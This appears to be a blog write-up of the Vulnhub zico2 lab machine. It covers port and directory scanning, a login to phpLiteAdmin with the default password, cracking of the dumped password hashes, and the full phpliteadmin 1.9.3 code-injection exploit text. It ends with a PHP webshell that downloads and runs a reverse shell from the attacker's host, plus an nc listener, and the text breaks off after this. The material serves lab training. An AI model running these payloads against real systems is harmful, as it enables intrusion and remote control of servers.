{"id":386,"date":"2024-03-01T18:32:49","date_gmt":"2024-03-01T10:32:49","guid":{"rendered":"http:\/\/162.14.82.114\/?p=386"},"modified":"2024-03-01T18:32:49","modified_gmt":"2024-03-01T10:32:49","slug":"vulnhub-zico2","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/386\/03\/01\/2024\/","title":{"rendered":"Vulnhub&#8211;zico2"},"content":{"rendered":"<h1>zico2<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831435.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831435.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240301143804428\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>Setting up the lab<\/h2>\n<p>Upgrade the virtual machine, switch it to NAT mode, then try opening it and scan:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831437.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831437.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240301150030309\" \/><\/div><\/p>\n<p>Found it; open it and take a look:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831439.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831439.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240301150118052\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Now we can start the attack.<\/p>\n<h2>Information gathering<\/h2>\n<h3>wappalyzer<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831440.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831440.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240301150209362\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<h3>Port scanning<\/h3>\n<pre><code class=\"language-bash\">rustscan -a 192.168.244.129 -- -A -sV -sT <\/code><\/pre>\n<pre><code class=\"language-bash\">.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\n\ud83d\ude35 https:\/\/admin.tryhackme.com\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. \nOpen 192.168.244.129:22\nOpen 192.168.244.129:80\nOpen 192.168.244.129:111\nOpen 192.168.244.129:50096\n[~] Starting Script(s)\n[&gt;] Script to be run Some(&quot;nmap -vvv -p {{port}} {{ip}}&quot;)\n\n[~] Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-03-01 02:06 EST\nNSE: Loaded 156 scripts for scanning.\nNSE: Script Pre-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 02:06\nCompleted NSE at 02:06, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 02:06\nCompleted NSE at 02:06, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 02:06\nCompleted NSE at 02:06, 0.00s elapsed\nInitiating Ping Scan at 02:06\nScanning 192.168.244.129 [2 ports]\nCompleted Ping Scan at 02:06, 0.00s elapsed (1 total hosts)\nInitiating Parallel DNS resolution of 1 host. at 02:06\nCompleted Parallel DNS resolution of 1 host. 
at 02:06, 2.01s elapsed\nDNS resolution of 1 IPs took 2.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]\nInitiating Connect Scan at 02:06\nScanning 192.168.244.129 [4 ports]\nDiscovered open port 22\/tcp on 192.168.244.129\nDiscovered open port 111\/tcp on 192.168.244.129\nDiscovered open port 80\/tcp on 192.168.244.129\nDiscovered open port 50096\/tcp on 192.168.244.129\nCompleted Connect Scan at 02:06, 0.00s elapsed (4 total ports)\nInitiating Service scan at 02:06\nScanning 4 services on 192.168.244.129\nCompleted Service scan at 02:06, 11.04s elapsed (4 services on 1 host)\nNSE: Script scanning 192.168.244.129.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 02:06\nCompleted NSE at 02:06, 0.27s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 02:06\nCompleted NSE at 02:06, 0.01s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 02:06\nCompleted NSE at 02:06, 0.00s elapsed\nNmap scan report for 192.168.244.129\nHost is up, received syn-ack (0.00058s latency).\nScanned at 2024-03-01 02:06:15 EST for 11s\n\nPORT      STATE SERVICE REASON  VERSION\n22\/tcp    open  ssh     syn-ack OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   1024 68:60:de:c2:2b:c6:16:d8:5b:88:be:e3:cc:a1:25:75 (DSA)\n| ssh-dss AAAAB3NzaC1kc3MAAACBAJwR6q4VerUDe7bLXRL6ZPTXj5FY66he+WWlRSoQppwDLqrTG73Pa9qUHMDFb1LXN1qgg0p0lyfqvm8ZeN+98rbT0JW6+Wqa7v0K+N82xf87fVkJcXAuU\/A8OGR9eVMZmWsIOpabZexd5CHYgLO3k4YpPSdxc6S4zJcOGwXVnmGHAAAAFQDHjsPg0rmkbquTJRdlEZBVJe9+3QAAAIBjYIAiGvKhmJfzDjVfzlxRD1ET7ZhSoMDxU0KadwXQP1uBdlYVEteJQpUTEsA+7kFH7xhtZ\/zbK2afEFHriAphTJmz8GqkIR5CJXh3dZspdk2MHCgxkXl5G\/iVPLR9UShN+nsAVxfm0gffCqbqZu3Ridt3JwTXQbiDfXO\/a6T\/eQAAAIEAlsW\/i\/dUuFbRVO2zaAKwL\/CFWT19Al7+njszC5FCJ2deggmF\/NIKJUbJwkRZkwL4PY1HYj2xqn7ImhPSyvdCd+IFdw73Pndnjv0luDc8i\/a4JUEfna4rzXt1Y5c24J1pEoKA05VicyCBD2z6TodRJEVEFSsa1s8s2p9x6LxwsDw=\n|   2048 50:db:75:ba:11:2f:43:c9:ab:14:40:6d:7f:a1:ee:e3 (RSA)\n| ssh-rsa 
AAAAB3NzaC1yc2EAAAADAQABAAABAQDZt46W9slSN3Y6D2f931rijUPCEewhQWmBfGhybuF4qLftfJMuyFcREZkG6UretVI8ZnQn\/OMDgbf2DYMzKsRLnz7W5cGy1Mt1pWoG0iCgi2xHzLqOqPYo4mP9\/hdZT6pANXapETT55yx8sHAYLAa9NK5Dtyv+QNQ2dUUb1wUTCqgYffLVDgoHvNNDwCwB6biJf6uopqfg2KXvAzcqSa6oaRChJOXjFlM08HebMwkMSzrOXjWbXhFsONy5JuDf3WztCtLMsFrVRHTdDwTh7uL2UQ8Qcky+kP6Wd7G8NlW5RxubYIFpAM0u2SsQIjYOxz+eOfQ8GE3WjvaIBqX05gat\n|   256 11:5d:55:29:8a:77:d8:08:b4:00:9b:a3:61:93:fe:e5 (ECDSA)\n|_ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFxsiWE3WImfJcjiWS5asOVoMsn+0gFLU5AgPNs2ATokB7kw00IsB0YGrqClwYNauRRddkYMsi0icJSR60mYNSo=\n80\/tcp    open  http    syn-ack Apache httpd 2.2.22 ((Ubuntu))\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n|_http-server-header: Apache\/2.2.22 (Ubuntu)\n|_http-title: Zico&#039;s Shop\n111\/tcp   open  rpcbind syn-ack 2-4 (RPC #100000)\n| rpcinfo: \n|   program version    port\/proto  service\n|   100000  2,3,4        111\/tcp   rpcbind\n|   100000  2,3,4        111\/udp   rpcbind\n|   100000  3,4          111\/tcp6  rpcbind\n|   100000  3,4          111\/udp6  rpcbind\n|   100024  1          34879\/tcp6  status\n|   100024  1          48430\/udp   status\n|   100024  1          50096\/tcp   status\n|_  100024  1          59682\/udp6  status\n50096\/tcp open  status  syn-ack 1 (RPC #100024)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nNSE: Script Post-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 02:06\nCompleted NSE at 02:06, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 02:06\nCompleted NSE at 02:06, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 02:06\nCompleted NSE at 02:06, 0.00s elapsed\nRead data files from: \/usr\/bin\/..\/share\/nmap\nService detection performed. 
Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 14.31 seconds<\/code><\/pre>\n<h3>Directory scanning<\/h3>\n<pre><code class=\"language-bash\">ffuf -u http:\/\/192.168.244.129\/FUZZ -w \/usr\/share\/dirb\/wordlists\/common.txt <\/code><\/pre>\n<pre><code class=\"language-text\">        \/&#039;___\\  \/&#039;___\\           \/&#039;___\\       \n       \/\\ \\__\/ \/\\ \\__\/  __  __  \/\\ \\__\/       \n       \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\      \n        \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/      \n         \\ \\_\\   \\ \\_\\  \\ \\____\/  \\ \\_\\       \n          \\\/_\/    \\\/_\/   \\\/___\/    \\\/_\/       \n\n       v2.1.0-dev\n________________________________________________\n\n :: Method           : GET\n :: URL              : http:\/\/192.168.244.129\/FUZZ\n :: Wordlist         : FUZZ: \/usr\/share\/dirb\/wordlists\/common.txt\n :: Follow redirects : false\n :: Calibration      : false\n :: Timeout          : 10\n :: Threads          : 40\n :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500\n________________________________________________\n\n.hta                    [Status: 403, Size: 287, Words: 21, Lines: 11, Duration: 6ms]\n.htaccess               [Status: 403, Size: 292, Words: 21, Lines: 11, Duration: 2ms]\n                        [Status: 200, Size: 7970, Words: 2382, Lines: 184, Duration: 46ms]\ncgi-bin\/                [Status: 403, Size: 291, Words: 21, Lines: 11, Duration: 0ms]\n.htpasswd               [Status: 403, Size: 292, Words: 21, Lines: 11, Duration: 210ms]\ncss                     [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 2ms]\ndbadmin                 [Status: 301, Size: 320, Words: 20, Lines: 10, Duration: 0ms]\nimg                     [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 1ms]\nindex.html              [Status: 200, Size: 7970, Words: 2382, Lines: 184, Duration: 
0ms]\nindex                   [Status: 200, Size: 7970, Words: 2382, Lines: 184, Duration: 2ms]\njs                      [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 1ms]\nLICENSE                 [Status: 200, Size: 1094, Words: 156, Lines: 22, Duration: 7ms]\npackage                 [Status: 200, Size: 789, Words: 112, Lines: 30, Duration: 1ms]\nserver-status           [Status: 403, Size: 296, Words: 21, Lines: 11, Duration: 0ms]\ntools                   [Status: 200, Size: 8355, Words: 3291, Lines: 186, Duration: 1ms]\nvendor                  [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 2ms]\nview                    [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 9ms]\n:: Progress: [4614\/4614] :: Job [1\/1] :: 64 req\/sec :: Duration: [0:00:04] :: Errors: 0 ::<\/code><\/pre>\n<h3>Common vulnerability scanning<\/h3>\n<pre><code class=\"language-bash\">nikto -h 192.168.244.129<\/code><\/pre>\n<pre><code class=\"language-text\">- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP:          192.168.244.129\n+ Target Hostname:    192.168.244.129\n+ Target Port:        80\n+ Start Time:         2024-03-01 02:26:04 (GMT-5)\n---------------------------------------------------------------------------\n+ Server: Apache\/2.2.22 (Ubuntu)\n+ \/: Server may leak inodes via ETags, header found with file \/, inode: 3803593, size: 7970, mtime: Thu Jun  8 15:18:30 2017. See: http:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2003-1418\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. 
See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ \/index: Uncommon header &#039;tcn&#039; found, with contents: list.\n+ \/index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for &#039;index&#039; were found: index.html. See: http:\/\/www.wisec.it\/sectou.php?id=4698ebdc59d15,https:\/\/exchange.xforce.ibmcloud.com\/vulnerabilities\/8275\n+ Apache\/2.2.22 appears to be outdated (current is at least Apache\/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.\n+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS .\n+ \/css\/: Directory indexing found.\n+ \/css\/: This might be interesting.\n+ \/img\/: Directory indexing found.\n+ \/img\/: This might be interesting.\n+ \/icons\/README: Apache default file found. See: https:\/\/www.vntweb.co.uk\/apache-restricting-access-to-iconsreadme\/\n+ \/view.php?ariadne=http:\/\/blog.cirt.net\/rfiinc.txt?: Retrieved x-powered-by header: PHP\/5.3.10-1ubuntu3.26.\n+ \/#wp-config.php#: #wp-config.php# file found. 
This file contains the credentials.\n+ \/README.md: Readme Found.\n+ 8909 requests: 0 error(s) and 15 item(s) reported on remote host\n+ End Time:           2024-03-01 02:26:22 (GMT-5) (18 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n<h3>Blog scanning<\/h3>\n<pre><code class=\"language-bash\">wpscan --url http:\/\/192.168.244.129 --api-token=xxxxxxx\n# Not a WordPress site<\/code><\/pre>\n<pre><code class=\"language-bash\">whatweb 192.168.244.129\n#http:\/\/192.168.244.129 [200 OK] Apache[2.2.22], Bootstrap, Country[RESERVED][ZZ], Email[feedback@startbootstrap.com,your-email@your-domain.com], HTML5, HTTPServer[Ubuntu Linux][Apache\/2.2.22 (Ubuntu)], IP[192.168.244.129], JQuery, Script, Title[Zico&#039;s Shop], X-UA-Compatible[IE=edge]<\/code><\/pre>\n<h3>Manual inspection<\/h3>\n<p>Found one interesting spot:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831441.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831441.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240301170823805\" \/><\/div><\/p>\n<h2>Exploitation<\/h2>\n<h3>Directory traversal<\/h3>\n<p>Try directory traversal on the page we just looked at:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831442.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831442.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240301170926114\" \/><\/div><\/p>\n<h3>Inspecting the web directories<\/h3>\n<p>The scan just turned up quite a few directories; take a look:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831443.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831443.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240301171111601\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831444.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  
decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831444.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240301171129333\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>The admin tool turns out to be <code>phpLiteAdmin<\/code>.<\/p>\n<p>Tried a universal password without success, then tried the weak password <code>admin<\/code>, which got in:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831445.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831445.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240301171433385\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Looking through the data turns up sensitive information:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831446.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" 
data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831446.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240301172036624\" \/><\/div><\/p>\n<p>Try cracking them:<\/p>\n<pre><code class=\"language-apl\">(root)653F4B285089453FE00E2AAFAC573414  --&gt;  34kroot34\n(zico)96781A607F4E9F5F423AC01F0DAB0EBD  --&gt;  zico2215@<\/code><\/pre>\n<p>Tried logging in with these; unfortunately, it failed.<\/p>\n<h3>Looking up related vulnerabilities<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831447.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831447.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240301175750788\" \/><\/div><\/p>\n<pre><code class=\"language-text\"># Exploit Title: phpliteadmin &lt;= 1.9.3 Remote PHP Code Injection Vulnerability\n# Google Dork: inurl:phpliteadmin.php (Default PW: admin)\n# Date: 01\/10\/2013\n# Exploit Author: L@usch - http:\/\/la.usch.io - http:\/\/la.usch.io\/files\/exploits\/phpliteadmin-1.9.3.txt\n# Vendor Homepage: http:\/\/code.google.com\/p\/phpliteadmin\/\n# Vendor Status: Informed\n# Software Link: http:\/\/phpliteadmin.googlecode.com\/files\/phpliteadmin_v1-9-3.zip\n# Version: 1.9.3\n# Tested on: Windows and 
Linux\n\nDescription:\n\nphpliteadmin.php#1784: &#039;Creating a New Database&#039; =&gt;\nphpliteadmin.php#1785: &#039;When you create a new database, the name you entered will be appended with the appropriate file extension (.db, .db3, .sqlite, etc.) if you do not include it yourself. The database will be created in the directory you specified as the $directory variable.&#039;,\n\nAn Attacker can create a sqlite Database with a php extension and insert PHP Code as text fields. When done the Attacker can execute it simply by access the database file with the Webbrowser.\n\nProof of Concept:\n\n1. We create a db named &quot;hack.php&quot;.\n(Depending on Server configuration sometimes it will not work and the name for the db will be &quot;hack.sqlite&quot;. Then simply try to rename the database \/ existing database to &quot;hack.php&quot;.)\nThe script will store the sqlite database in the same directory as phpliteadmin.php.\nPreview: http:\/\/goo.gl\/B5n9O\nHex preview: http:\/\/goo.gl\/lJ5iQ\n\n2. Now create a new table in this database and insert a text field with the default value:\n&lt;?php phpinfo()?&gt;\nHex preview: http:\/\/goo.gl\/v7USQ\n\n3. 
Now we run hack.php\n\nDone!\n\nProof: http:\/\/goo.gl\/ZqPVL <\/code><\/pre>\n<h3>Writing a webshell<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831448.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831448.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240301175610819\" \/><\/div><\/p>\n<pre><code class=\"language-php\"># zico2\n&lt;?php system(&quot;wget 192.168.244.128:8888\/shell.txt -O \/tmp\/shell.php; php \/tmp\/shell.php&quot;); ?&gt;\n# kali shell.txt    \n&lt;?php $sock=fsockopen(&quot;192.168.244.128&quot;,1234);exec(&quot;\/bin\/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3&quot;);?&gt;\npython3 -m http.server 8888\nnc -lvvp 1234<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403011831449.png'><img class=\"lazyload lazyload-style-2\" 